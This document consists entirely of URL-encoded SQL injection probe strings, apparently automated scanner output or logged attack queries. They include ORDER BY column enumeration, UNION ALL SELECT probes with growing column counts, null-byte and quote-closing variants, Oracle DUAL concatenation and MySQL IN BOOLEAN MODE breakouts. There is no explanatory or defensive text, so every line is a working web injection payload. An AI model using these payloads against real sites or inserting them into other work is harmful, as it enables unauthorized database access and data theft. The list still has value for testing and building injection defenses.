-6491%25%27%29%29%29%20UNION%20ALL%20SELECT%204213%2C4213%2C4213%2C4213%2C4213--%20 -2785%25%27%29%29%29%20UNION%20ALL%20SELECT%205914%2C5914%2C5914%2C5914%2C5914%2C5914--%20 -6495%25%27%29%29%29%20UNION%20ALL%20SELECT%203152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152--%20 -1476%25%27%29%29%29%20UNION%20ALL%20SELECT%205215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215--%20 -6349%25%27%29%29%29%20UNION%20ALL%20SELECT%203572%2C3572%2C3572%2C3572%2C3572%2C3572%2C3572%2C3572%2C3572--%20 -3250%25%27%29%29%29%20UNION%20ALL%20SELECT%203106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106--%20 -6223%25%27%20ORDER%20BY%201--%20 -6774%25%27%20ORDER%20BY%209948--%20 -6326%25%27%20UNION%20ALL%20SELECT%204211--%20 -4274%25%27%20UNION%20ALL%20SELECT%202475%2C2475--%20 -7494%25%27%20UNION%20ALL%20SELECT%208287%2C8287%2C8287--%20 -3373%25%27%20UNION%20ALL%20SELECT%209727%2C9727%2C9727%2C9727--%20 -8022%25%27%20UNION%20ALL%20SELECT%205767%2C5767%2C5767%2C5767%2C5767--%20 -8629%25%27%20UNION%20ALL%20SELECT%206404%2C6404%2C6404%2C6404%2C6404%2C6404--%20 -4758%25%27%20UNION%20ALL%20SELECT%206118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118--%20 -1604%25%27%20UNION%20ALL%20SELECT%208796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796--%20 -8375%25%27%20UNION%20ALL%20SELECT%202169%2C2169%2C2169%2C2169%2C2169%2C2169%2C2169%2C2169%2C2169--%20 -9793%25%27%20UNION%20ALL%20SELECT%208616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616--%20 -5640%00%27%29%20ORDER%20BY%201--%20 -5615%00%27%29%20ORDER%20BY%207203--%20 -4374%00%27%29%20UNION%20ALL%20SELECT%209762--%20 -7171%00%27%29%20UNION%20ALL%20SELECT%207345%2C7345--%20 -9246%00%27%29%20UNION%20ALL%20SELECT%209000%2C9000%2C9000--%20 -7385%00%27%29%20UNION%20ALL%20SELECT%207503%2C7503%2C7503%2C7503--%20 -3082%00%27%29%20UNION%20ALL%20SELECT%204326%2C4326%2C4326%2C4326%2C4326--%20 -2808%00%27%29%20UNION%20ALL%20SELECT%203811%2C3811%2C3811%2C3811%2C3811%2C3811--%20 -5126%00%27%29%20UNION%20ALL%20SELECT%202163%2C2163%2C2163%2C2163%2C2163%2C2163%2C2163--%20 -4946%00%27%29%20UNION%20ALL%20SELECT%207236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236--%20 -7964%00%27%29%20UNION%20ALL%20SELECT%204801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801--%20 -4127%00%27%29%20UNION%20ALL%20SELECT%209476%2C9476%2C9476%2C9476%2C9476%2C9476%2C9476%2C9476%2C9476%2C9476--%20 -9852%00%27%20ORDER%20BY%201--%20 -4176%00%27%20ORDER%20BY%203809--%20 -1452%00%27%20UNION%20ALL%20SELECT%204922--%20 -1793%00%27%20UNION%20ALL%20SELECT%205326%2C5326--%20 -7842%00%27%20UNION%20ALL%20SELECT%203911%2C3911%2C3911--%20 -4619%00%27%20UNION%20ALL%20SELECT%201168%2C1168%2C1168%2C1168--%20 -3676%00%27%20UNION%20ALL%20SELECT%205152%2C5152%2C5152%2C5152%2C5152--%20 -1489%00%27%20UNION%20ALL%20SELECT%205900%2C5900%2C5900%2C5900%2C5900%2C5900--%20 -3965%00%27%20UNION%20ALL%20SELECT%203061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061--%20 -6487%00%27%20UNION%20ALL%20SELECT%207072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072--%20 -4118%00%27%20UNION%20ALL%20SELECT%209480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480--%20 -2749%00%27%20UNION%20ALL%20SELECT%209352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352--%20 -5149%27%29%20WHERE%204639%3D4639%20ORDER%20BY%201--%20 -3503%27%29%20WHERE%205262%3D5262%20ORDER%20BY%203488--%20 -5095%27%29%20WHERE%209265%3D9265%20UNION%20ALL%20SELECT%209265--%20 -4388%27%29%20WHERE%207213%3D7213%20UNION%20ALL%20SELECT%207213%2C7213--%20 -7529%27%29%20WHERE%207398%3D7398%20UNION%20ALL%20SELECT%207398%2C7398%2C7398--%20 -6583%27%29%20WHERE%202392%3D2392%20UNION%20ALL%20SELECT%202392%2C2392%2C2392%2C2392--%20 -2360%27%29%20WHERE%206027%3D6027%20UNION%20ALL%20SELECT%206027%2C6027%2C6027%2C6027%2C6027--%20 -9510%27%29%20WHERE%209003%3D9003%20UNION%20ALL%20SELECT%209003%2C9003%2C9003%2C9003%2C9003%2C9003--%20 -6886%27%29%20WHERE%208273%3D8273%20UNION%20ALL%20SELECT%208273%2C8273%2C8273%2C8273%2C8273%2C8273%2C8273--%20 -3797%27%29%20WHERE%209373%3D9373%20UNION%20ALL%20SELECT%209373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373--%20 -3703%27%29%20WHERE%208335%3D8335%20UNION%20ALL%20SELECT%208335%2C8335%2C8335%2C8335%2C8335%2C8335%2C8335%2C8335%2C8335--%20 -2839%27%29%20WHERE%205970%3D5970%20UNION%20ALL%20SELECT%205970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970--%20 -2117%22%29%20WHERE%202518%3D2518%20ORDER%20BY%201--%20 -6633%22%29%20WHERE%206229%3D6229%20ORDER%20BY%203268--%20 -7991%22%29%20WHERE%207735%3D7735%20UNION%20ALL%20SELECT%207735--%20 -5853%22%29%20WHERE%203644%3D3644%20UNION%20ALL%20SELECT%203644%2C3644--%20 -2037%22%29%20WHERE%205776%3D5776%20UNION%20ALL%20SELECT%205776%2C5776%2C5776--%20 -1308%22%29%20WHERE%209900%3D9900%20UNION%20ALL%20SELECT%209900%2C9900%2C9900%2C9900--%20 -2864%22%29%20WHERE%206015%3D6015%20UNION%20ALL%20SELECT%206015%2C6015%2C6015%2C6015%2C6015--%20 -6977%22%29%20WHERE%208961%3D8961%20UNION%20ALL%20SELECT%208961%2C8961%2C8961%2C8961%2C8961%2C8961--%20 -5408%22%29%20WHERE%207377%3D7377%20UNION%20ALL%20SELECT%207377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377--%20 -4863%22%29%20WHERE%201617%3D1617%20UNION%20ALL%20SELECT%201617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617--%20 -5088%22%29%20WHERE%205690%3D5690%20UNION%20ALL%20SELECT%205690%2C5690%2C5690%2C5690%2C5690%2C5690%2C5690%2C5690%2C5690--%20 -6488%22%29%20WHERE%204236%3D4236%20UNION%20ALL%20SELECT%204236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236--%20 -1594%29%20WHERE%203566%3D3566%20ORDER%20BY%201--%20 -7394%29%20WHERE%202296%3D2296%20ORDER%20BY%201865--%20 -9396%29%20WHERE%204952%3D4952%20UNION%20ALL%20SELECT%204952--%20 -9357%29%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%208648%2C8648--%20 -4668%29%20WHERE%208334%3D8334%20UNION%20ALL%20SELECT%208334%2C8334%2C8334--%20 -2886%29%20WHERE%208302%3D8302%20UNION%20ALL%20SELECT%208302%2C8302%2C8302%2C8302--%20 -7139%29%20WHERE%206708%3D6708%20UNION%20ALL%20SELECT%206708%2C6708%2C6708%2C6708%2C6708--%20 -9136%29%20WHERE%202635%3D2635%20UNION%20ALL%20SELECT%202635%2C2635%2C2635%2C2635%2C2635%2C2635--%20 -9948%29%20WHERE%201750%3D1750%20UNION%20ALL%20SELECT%201750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750--%20 -4995%29%20WHERE%208546%3D8546%20UNION%20ALL%20SELECT%208546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546--%20 -8490%29%20WHERE%208138%3D8138%20UNION%20ALL%20SELECT%208138%2C8138%2C8138%2C8138%2C8138%2C8138%2C8138%2C8138%2C8138--%20 -5783%29%20WHERE%203149%3D3149%20UNION%20ALL%20SELECT%203149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149--%20 -8709%27%20WHERE%208083%3D8083%20ORDER%20BY%201--%20 -6088%27%20WHERE%208163%3D8163%20ORDER%20BY%201816--%20 -4658%27%20WHERE%203109%3D3109%20UNION%20ALL%20SELECT%203109--%20 -3882%27%20WHERE%205589%3D5589%20UNION%20ALL%20SELECT%205589%2C5589--%20 -3239%27%20WHERE%205031%3D5031%20UNION%20ALL%20SELECT%205031%2C5031%2C5031--%20 -5148%27%20WHERE%204641%3D4641%20UNION%20ALL%20SELECT%204641%2C4641%2C4641%2C4641--%20 -7562%27%20WHERE%207117%3D7117%20UNION%20ALL%20SELECT%207117%2C7117%2C7117%2C7117%2C7117--%20 -7031%27%20WHERE%207818%3D7818%20UNION%20ALL%20SELECT%207818%2C7818%2C7818%2C7818%2C7818%2C7818--%20 -1733%27%20WHERE%206535%3D6535%20UNION%20ALL%20SELECT%206535%2C6535%2C6535%2C6535%2C6535%2C6535%2C6535--%20 -7746%27%20WHERE%208597%3D8597%20UNION%20ALL%20SELECT%208597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597--%20 -2153%27%20WHERE%202252%3D2252%20UNION%20ALL%20SELECT%202252%2C2252%2C2252%2C2252%2C2252%2C2252%2C2252%2C2252%2C2252--%20 -6294%27%20WHERE%203281%3D3281%20UNION%20ALL%20SELECT%203281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281--%20 -6186%22%20WHERE%201576%3D1576%20ORDER%20BY%201--%20 -7638%22%20WHERE%207795%3D7795%20ORDER%20BY%209200--%20 -4916%22%20WHERE%201164%3D1164%20UNION%20ALL%20SELECT%201164--%20 -9409%22%20WHERE%201996%3D1996%20UNION%20ALL%20SELECT%201996%2C1996--%20 -7881%22%20WHERE%202389%3D2389%20UNION%20ALL%20SELECT%202389%2C2389%2C2389--%20 -7592%22%20WHERE%202921%3D2921%20UNION%20ALL%20SELECT%202921%2C2921%2C2921%2C2921--%20 -1876%22%20WHERE%207352%3D7352%20UNION%20ALL%20SELECT%207352%2C7352%2C7352%2C7352%2C7352--%20 -8447%22%20WHERE%205042%3D5042%20UNION%20ALL%20SELECT%205042%2C5042%2C5042%2C5042%2C5042%2C5042--%20 -7767%22%20WHERE%206709%3D6709%20UNION%20ALL%20SELECT%206709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709--%20 -9111%22%20WHERE%201915%3D1915%20UNION%20ALL%20SELECT%201915%2C1915%2C1915%2C1915%2C1915%2C1915%2C1915%2C1915--%20 -4136%22%20WHERE%204198%3D4198%20UNION%20ALL%20SELECT%204198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198--%20 -7596%22%20WHERE%208839%3D8839%20UNION%20ALL%20SELECT%208839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839--%20 -5124%20WHERE%203212%3D3212%20ORDER%20BY%201--%20 -5832%20WHERE%206112%3D6112%20ORDER%20BY%202120--%20 -5799%20WHERE%204741%3D4741%20UNION%20ALL%20SELECT%204741--%20 -3944%20WHERE%209697%3D9697%20UNION%20ALL%20SELECT%209697%2C9697--%20 -8963%20WHERE%206175%3D6175%20UNION%20ALL%20SELECT%206175%2C6175%2C6175--%20 -1406%20WHERE%202974%3D2974%20UNION%20ALL%20SELECT%202974%2C2974%2C2974%2C2974--%20 -6332%20WHERE%209803%3D9803%20UNION%20ALL%20SELECT%209803%2C9803%2C9803%2C9803%2C9803--%20 -6891%20WHERE%208265%3D8265%20UNION%20ALL%20SELECT%208265%2C8265%2C8265%2C8265%2C8265%2C8265--%20 -9135%20WHERE%203706%3D3706%20UNION%20ALL%20SELECT%203706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706--%20 -6967%20WHERE%203217%3D3217%20UNION%20ALL%20SELECT%203217%2C3217%2C3217%2C3217%2C3217%2C3217%2C3217%2C3217--%20 -7420%20WHERE%207538%3D7538%20UNION%20ALL%20SELECT%207538%2C7538%2C7538%2C7538%2C7538%2C7538%2C7538%2C7538%2C7538--%20 -3949%20WHERE%209288%3D9288%20UNION%20ALL%20SELECT%209288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288--%20 -6765%27%7C%7C%28SELECT%20%27BibM%27%20FROM%20DUAL%20WHERE%209185%3D9185%20ORDER%20BY%201--%20 -2347%27%7C%7C%28SELECT%20%27vLkG%27%20FROM%20DUAL%20WHERE%203385%3D3385%20ORDER%20BY%201075--%20 -3534%27%7C%7C%28SELECT%20%27lcth%27%20FROM%20DUAL%20WHERE%203251%3D3251%20UNION%20ALL%20SELECT%203251--%20 -8307%27%7C%7C%28SELECT%20%27guaY%27%20FROM%20DUAL%20WHERE%205406%3D5406%20UNION%20ALL%20SELECT%205406%2C5406--%20 -4797%27%7C%7C%28SELECT%20%27poRG%27%20FROM%20DUAL%20WHERE%206437%3D6437%20UNION%20ALL%20SELECT%206437%2C6437%2C6437--%20 -1016%27%7C%7C%28SELECT%20%27DOPo%27%20FROM%20DUAL%20WHERE%206440%3D6440%20UNION%20ALL%20SELECT%206440%2C6440%2C6440%2C6440--%20 -2330%27%7C%7C%28SELECT%20%27WoCQ%27%20FROM%20DUAL%20WHERE%209041%3D9041%20UNION%20ALL%20SELECT%209041%2C9041%2C9041%2C9041%2C9041--%20 -3066%27%7C%7C%28SELECT%20%27uFda%27%20FROM%20DUAL%20WHERE%207921%3D7921%20UNION%20ALL%20SELECT%207921%2C7921%2C7921%2C7921%2C7921%2C7921--%20 -5458%27%7C%7C%28SELECT%20%27PpGb%27%20FROM%20DUAL%20WHERE%207881%3D7881%20UNION%20ALL%20SELECT%207881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881--%20 -2652%27%7C%7C%28SELECT%20%27eBqS%27%20FROM%20DUAL%20WHERE%202849%3D2849%20UNION%20ALL%20SELECT%202849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849--%20 -9040%27%7C%7C%28SELECT%20%27AgSD%27%20FROM%20DUAL%20WHERE%206289%3D6289%20UNION%20ALL%20SELECT%206289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289--%20 -2389%27%7C%7C%28SELECT%20%27BeRR%27%20FROM%20DUAL%20WHERE%204863%3D4863%20UNION%20ALL%20SELECT%204863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863--%20 -2110%27%7C%7C%28SELECT%20%27CBuX%27%20WHERE%201033%3D1033%20ORDER%20BY%201--%20 -2092%27%7C%7C%28SELECT%20%27ooBW%27%20WHERE%204163%3D4163%20ORDER%20BY%207246--%20 -7354%27%7C%7C%28SELECT%20%27tPbN%27%20WHERE%208659%3D8659%20UNION%20ALL%20SELECT%208659--%20 -4143%27%7C%7C%28SELECT%20%27SwAh%27%20WHERE%202149%3D2149%20UNION%20ALL%20SELECT%202149%2C2149--%20 -5036%27%7C%7C%28SELECT%20%27FQwb%27%20WHERE%203328%3D3328%20UNION%20ALL%20SELECT%203328%2C3328%2C3328--%20 -9443%27%7C%7C%28SELECT%20%27xDuo%27%20WHERE%206154%3D6154%20UNION%20ALL%20SELECT%206154%2C6154%2C6154%2C6154--%20 -4217%27%7C%7C%28SELECT%20%27leAp%27%20WHERE%209221%3D9221%20UNION%20ALL%20SELECT%209221%2C9221%2C9221%2C9221%2C9221--%20 -3235%27%7C%7C%28SELECT%20%27MPFY%27%20WHERE%202016%3D2016%20UNION%20ALL%20SELECT%202016%2C2016%2C2016%2C2016%2C2016%2C2016--%20 -1453%27%7C%7C%28SELECT%20%27foAU%27%20WHERE%209730%3D9730%20UNION%20ALL%20SELECT%209730%2C9730%2C9730%2C9730%2C9730%2C9730%2C9730--%20 -3602%27%7C%7C%28SELECT%20%27PANH%27%20WHERE%203825%3D3825%20UNION%20ALL%20SELECT%203825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825--%20 -7854%27%7C%7C%28SELECT%20%27GzQq%27%20WHERE%202540%3D2540%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -8348%27%7C%7C%28SELECT%20%27gmdY%27%20WHERE%203605%3D3605%20UNION%20ALL%20SELECT%203605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605--%20 -1448%27%2B%28SELECT%20FtnW%20WHERE%205025%3D5025%20ORDER%20BY%201--%20 -5269%27%2B%28SELECT%20irEa%20WHERE%204204%3D4204%20ORDER%20BY%202168--%20 -4867%27%2B%28SELECT%20tujJ%20WHERE%205675%3D5675%20UNION%20ALL%20SELECT%205675--%20 -1372%27%2B%28SELECT%20JXcZ%20WHERE%205952%3D5952%20UNION%20ALL%20SELECT%205952%2C5952--%20 -3835%27%2B%28SELECT%20wAIM%20WHERE%206205%3D6205%20UNION%20ALL%20SELECT%206205%2C6205%2C6205--%20 -3812%27%2B%28SELECT%20iKpf%20WHERE%204732%3D4732%20UNION%20ALL%20SELECT%204732%2C4732%2C4732%2C4732--%20 -4147%27%2B%28SELECT%20eCRf%20WHERE%209352%3D9352%20UNION%20ALL%20SELECT%209352%2C9352%2C9352%2C9352%2C9352--%20 -3427%27%2B%28SELECT%20Clnb%20WHERE%202857%3D2857%20UNION%20ALL%20SELECT%202857%2C2857%2C2857%2C2857%2C2857%2C2857--%20 -6731%27%2B%28SELECT%20LMUc%20WHERE%209045%3D9045%20UNION%20ALL%20SELECT%209045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045--%20 -5821%27%2B%28SELECT%20zYFF%20WHERE%204513%3D4513%20UNION%20ALL%20SELECT%204513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513--%20 -3272%27%2B%28SELECT%20FVzg%20WHERE%207784%3D7784%20UNION%20ALL%20SELECT%207784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784--%20 -6893%27%2B%28SELECT%20xUuq%20WHERE%209038%3D9038%20UNION%20ALL%20SELECT%209038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038--%20 -5564%27%2B%28SELECT%20%27bWJu%27%20WHERE%205326%3D5326%20ORDER%20BY%201--%20 -4801%27%2B%28SELECT%20%27rIBo%27%20WHERE%207253%3D7253%20ORDER%20BY%205150--%20 -1342%27%2B%28SELECT%20%27xueB%27%20WHERE%202192%3D2192%20UNION%20ALL%20SELECT%202192--%20 -1096%27%2B%28SELECT%20%27SGuX%27%20WHERE%207182%3D7182%20UNION%20ALL%20SELECT%207182%2C7182--%20 -7945%27%2B%28SELECT%20%27NGbp%27%20WHERE%203864%3D3864%20UNION%20ALL%20SELECT%203864%2C3864%2C3864--%20 -3104%27%2B%28SELECT%20%27jcsU%27%20WHERE%205802%3D5802%20UNION%20ALL%20SELECT%205802%2C5802%2C5802%2C5802--%20 -9413%27%2B%28SELECT%20%27FBaN%27%20WHERE%206396%3D6396%20UNION%20ALL%20SELECT%206396%2C6396%2C6396%2C6396%2C6396--%20 -8645%27%2B%28SELECT%20%27tkSB%27%20WHERE%204053%3D4053%20UNION%20ALL%20SELECT%204053%2C4053%2C4053%2C4053%2C4053%2C4053--%20 -2938%27%2B%28SELECT%20%27BbsW%27%20WHERE%209743%3D9743%20UNION%20ALL%20SELECT%209743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743--%20 -3762%27%2B%28SELECT%20%27OvTO%27%20WHERE%203842%3D3842%20UNION%20ALL%20SELECT%203842%2C3842%2C3842%2C3842%2C3842%2C3842%2C3842%2C3842--%20 -8436%27%2B%28SELECT%20%27kTRg%27%20WHERE%203330%3D3330%20UNION%20ALL%20SELECT%203330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330--%20 -7941%27%2B%28SELECT%20%27wLec%27%20WHERE%206403%3D6403%20UNION%20ALL%20SELECT%206403%2C6403%2C6403%2C6403%2C6403%2C6403%2C6403%2C6403%2C6403%2C6403--%20 -7894%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20 -8835%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%209622--%20 -5630%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207549--%20 -2696%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203316%2C3316--%20 -4370%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204551%2C4551%2C4551--%20 -2429%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202398%2C2398%2C2398%2C2398--%20 -7476%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209772%2C9772%2C9772%2C9772%2C9772--%20 -4957%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204903%2C4903%2C4903%2C4903%2C4903%2C4903--%20 -2747%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201780%2C1780%2C1780%2C1780%2C1780%2C1780%2C1780--%20 -3739%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096--%20 -9407%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825--%20 -5930%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408%2C7408--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 